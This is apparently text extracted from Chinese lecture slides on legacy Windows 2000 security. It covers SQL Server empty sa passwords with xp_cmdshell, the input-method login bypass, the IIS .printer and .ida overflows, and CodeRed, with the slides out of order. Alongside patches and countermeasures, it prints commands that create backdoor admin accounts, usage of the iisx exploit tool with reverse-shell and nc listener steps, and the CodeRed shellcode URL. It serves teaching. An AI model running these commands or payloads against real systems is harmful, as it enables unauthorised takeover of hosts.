net user adminhack mypass /add net localgroup administrators adminhack /add
对策
• 严格设定sa及其他数据库用户的访问口令
• 删除一些不必要的扩展存储过程，尤其是xp_cmdshell
远程终端与输入法攻击
利用输入法漏洞攻击
MS-SQL Server sa空口令
微软公司的SQL Server有一个致命的漏洞，其实是缺省安装带 来的，那就是数据库超级管理员sa的缺省设置口令为空。在SQL Server 2000之前，包括6.5和7.0版本都是如此（在安装过程中没有提 示输入sa的口令），不过，在SQL Server 2000版的安装过程中，会 提示安装者输入一个sa的口令。 攻击者可能通过不设口令的sa账号 登录进SQL Server。 更严重的是，SQL Server的master数据库中提供一些可以对系统 进行操作的扩展存储过程，具有sa身份的攻击者当然不会放过这个 机会，通过这些扩展存储过程，尤其是xp_cmdshell，可以执行任何 shell命令。 因为SQL Server服务程序的用户身份往往是system这个特殊的本 地账户（或者是属于域管理员组），它具有最高权限，可以进行诸 如创建一个管理员账户、拷贝删除文件等操作。
• 手动方式设置服务器：
– 设置 控制面板 管理工具 INTERNET服务管理器 右键单击 你的站点 如我的是 2000server 属性 编辑 WWW服务 主目 录配置应用程序配置找到.printer清除
ISAPI .ida/.idq漏洞与 CodeRed
IIS ISAPI Idq远程溢出漏洞
蠕虫的三部曲
• 传播
– Version 1: Deface web page in memory, not file. Static seed to generate random IP. F.g. random() function – Version 2: Don’t deface web page. Pseudo random IP. – Different random IP pattern: 1/8: random, 1/2 : same A class, 3/8 :
Case Study
Windows安全问题与对策
几个问题
• MS SQL sa空口令问题 • 输入法漏洞 • IIS的几个重大漏洞
– Unicode – ISAP.Printer – Index.ida：CodeRed、Nimda
• MIME的问题（IE、Outlook） • 网络蠕虫（CodeRed、Nimda） • Win2000 Server的CheckList
– 通过发送GET /NULL.printer HTTP/1.0\n请求，然后传送一超长 字符串给目标主机，去检测是否存在.printer漏洞。
• ISS Internet Scanner／System Scanner
解决办法
• 安全微软针对这漏洞发的补丁：
– /Downloads/Release.asp?ReleaseI D=29321 （或SP2)
• GET /default.ida?之后有224个相同的字母请求数据
报；
CodeRed
蠕虫的三部曲
• 感染：
– Checks to see if it has already infected this system by verifying the existence of the CodeRed II atom. – Checks the default system language, and spawns threads for propagation. “Chinese", 600 threads, 48 hours, rest 2 day. Otherwise, 300 threads, 24 hours, rest 1 days.
same B class.
蠕虫的三部曲
• 携带
– 蠕虫会有计划的把 cmd.exe 以 root.exe 的名字复制到 msadc 和 scripts 目录下，更名为root.exe,成为了一个可怕的后门。 – 将蠕虫中包含的一段2进制代码拆离成文件名为explore.exe的木马 到本地的驱动器(c:\和d:\)。 – 通过修改注册表，把c:\，d:\变成iis的虚拟目录。
– -a --- iisx 192.168.6.198 1 -a
• 在192.168.6.198上添加一个管理员帐号：hax，其密码也为hax, 可以使用net use \\ 192.168.6.198 \ipc$ "hax" /user:"hax"建立 连接。
攻击办法
– -r --- 反向连接（类似于jill的方式），具体实施方法如下：
几个利用到的命令
• Net user myname passwd /add • Net localgroup administrators myname /add • Net user guest /active:yes
利用输入法漏洞进行攻击
1
2
3
4
5
6
输入法攻击的防御
• 安装2000 SP2或 NT SP6a(MS00-069 ) • 只保留一种输入法，在c:\winnt目录下删除下 列文件
WINGB.IME WINPY.IME WINSP.IME WINZM.IME 内码输入法 全拼输入法 双拼输入法 郑码输入法
• 删除输入法的帮助文件
• WINIME.CHM 输入法操作指南 WINSP.CHM 双拼输入法帮助 WINZM.CHM 郑码输入法帮助 WINPY.CHM 全拼输入法帮助 WINGB.CHM 内码输入法帮助
ISAPI扩展
• IIS5.0可以执行用户扩展的功能（动态连接库） • 管理员权限执行的动态连接库
– – – – – – – idq.dll httpext.dll httpodbc.dll admin.dll shtml.dll msw3prt.dll ……
• 执行时不检查路径
原理
• 微软Win 2K IIS 5的打印ISAPI扩展接口建立了 .printer扩展名到msw3prt.dll的映射关系，缺省 情况下该映射存在。 • 当远程用户提交对.printer的URL请求时，IIS5调 用msw3prt.dll解释该请求。 • 由于msw3prt.dll缺乏足够的缓冲区边界检查，远 程用户可以提交一个精心构造的针对.printer的 URL请求，其“Host:”域包含大约420字节的数 据，此时在msw3prt.dll中发生典型的缓冲区溢出 ，潜在允许执行任意代码。
• 例如先在一台机器192.168.6.150上运行nc -vv -l -p 5432, • 然后对攻击目标运行iisx 192.168.6.198 1 -r 192.168.6.150 5432, • 这时在192.168.6.150就会出现来自66.77.88.99的连接。
检测办法
• 发布的EasyScan • 发布的x-scaner • 自己编写一个Perl 的扫描软件
Shell Code

Codered worm shellcode
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00 %u531 b%u53ff%u0078%u0000%u00=a
• 目标主机将开放99端口
攻击办法
• 使用方法: iisx <目标主机> <sp> <-p|-a|-r attackhost attackport>
– sp: 0 --- 目标没有安装SP , 1 --- 目标安装了SP1 – -p --- iisx 192.168.6.198 1 –p
• 在192.168.6.198上开一个端口7788,可以直接telnet 192.168.6.198 7788
第一步：
• 使用扫描软件发现远程开放3389端口；
– SuperScaner； – ISS
• 使用微软提供的“终端服务客户端”程序
– 只有“管理员”权限的用户才可以远程登陆 – 登陆时间只有一分钟
终端服务客户端
输入法攻击可以达到的目的
• 改变文件属性或位置； • 直接对主页进行篡改 • 增加、激活用户，并改变用户权限；
• 攻击对象：
– Windows 2000中文系列； – 未安装Service Packet 2（2001.6.8）
• 攻击原理：
– 利用输入法帮助文件的漏洞，绕过系统的身份认证机制，直接获 得系统文件的控制权限。
利用输入法漏洞攻击
• 攻击条件：
– 物理上可以接触到主机； – 开放了远程终端服务（3389） – 运行IIS服务(非必须)
攻击Байду номын сангаас法
• 1、小榕的IIS5Exploit（jill.c) • 2、提供的iis5hack • 3、提供的iisx
攻击办法